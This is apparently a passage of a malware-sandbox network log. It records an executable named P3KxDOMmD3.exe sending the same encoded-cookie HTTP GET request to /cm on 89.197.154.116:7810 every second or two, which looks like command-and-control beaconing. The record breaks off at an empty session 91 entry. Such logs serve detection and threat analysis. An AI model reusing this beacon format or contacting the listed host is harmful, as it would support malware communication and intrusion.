Oct 7, 2024 22:01:46.052144051 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50061	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:47.822410107 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50062	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:49.522207975 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50063	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:51.242039919 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	50064	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:52.926464081 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	50065	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:54.649739027 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50066	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:56.348076105 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	50067	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:58.071683884 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	50068	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:01:59.771812916 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	50069	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:01.082264900 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	50070	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:02.863746881 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	50071	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:04.647593975 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50072	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:06.399795055 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50073	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:08.100724936 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50074	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:09.802129030 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50075	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:11.488812923 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50076	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:13.223272085 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50077	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:14.910922050 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50078	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:19.103069067 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50079	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:20.786087990 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50080	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:22.475806952 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50081	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:24.164942980 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50082	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:25.899882078 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50083	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:27.707072973 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50084	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:29.410497904 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50085	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:31.275403023 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50086	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:32.988095045 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50087	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:34.695804119 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50088	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:36.399215937 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50089	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:38.119827032 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50090	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:40.036904097 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50091	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:41.723145008 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50092	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:43.504689932 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50093	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:45.223099947 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50094	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:02:46.958383083 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50095	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
